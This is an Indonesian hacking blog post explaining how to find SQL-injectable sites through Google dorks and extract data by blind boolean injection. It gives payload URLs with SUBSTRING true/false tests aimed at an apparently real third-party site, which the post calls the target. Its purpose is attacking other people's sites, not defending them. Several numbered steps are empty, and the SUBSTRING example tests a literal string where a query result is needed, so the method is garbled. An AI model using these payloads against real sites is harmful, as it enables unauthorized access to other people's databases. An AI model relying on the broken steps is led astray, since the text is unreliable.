Minggu, 04 Juni 2017

Cara Menebak Dork / Kata Kunci

Cara Menebak Dork / Kata Kunci
 


Selamat malam Sobat blogger ,kali ini mimin mau share apa sih itu dork dan gimana sih cara mengetahui vesi mysql nya yaudh langsung aja yaa guys kita baca bersama .....
  • example : “http://target site/detail.php?id=***”
  • Jadi Vuln filenya adalah : detail.php
  • Dork / Value's : (?)id=***
1. Setelah itu kita cari Di google dengan keyword :
2. Sebagai contoh saya mendapatkan hasil :
3. Buka new tab di browser anda, lalu attack site diatas :
  • sama seperti sql injection,kita cari dulu lobangnya..
4. Setelah itu kita cari versi sql nya :
5. Exploiting True/False conditions
  • Select user returns ‘dbo’
  • SUBSTRING(‘Select user’, 1, 1) = ‘d’
  • SUBSTRING(‘Select user’, 2, 1) = ‘b’
  • SUBSTRING(‘Select user’, 3, 1) = ‘o’
  • http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘d’ TRUE
  • http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘X’ FALSE
  • Select user returns ‘dbo’
  • SUBSTRING(‘Select user’, 1, 1) = ‘d’
  • SUBSTRING(‘Select user’, 2, 1) = ‘b’
  • SUBSTRING(‘Select user’, 3, 1) = ‘o’
  • Jadi DB username nya : dbo
Share This :
SUBSCRIBE TO OUR NEWSLETTER

Add Your Comments

bold <b>b</b>
italic <i>i</i>
underline <u>u</u>
HTML<code></code> use Parser

Emoticon
Parser
😊
😉
😀
😁
😎
😍
😜
😑
😇
💖
😯
😱
😭
👍
🍻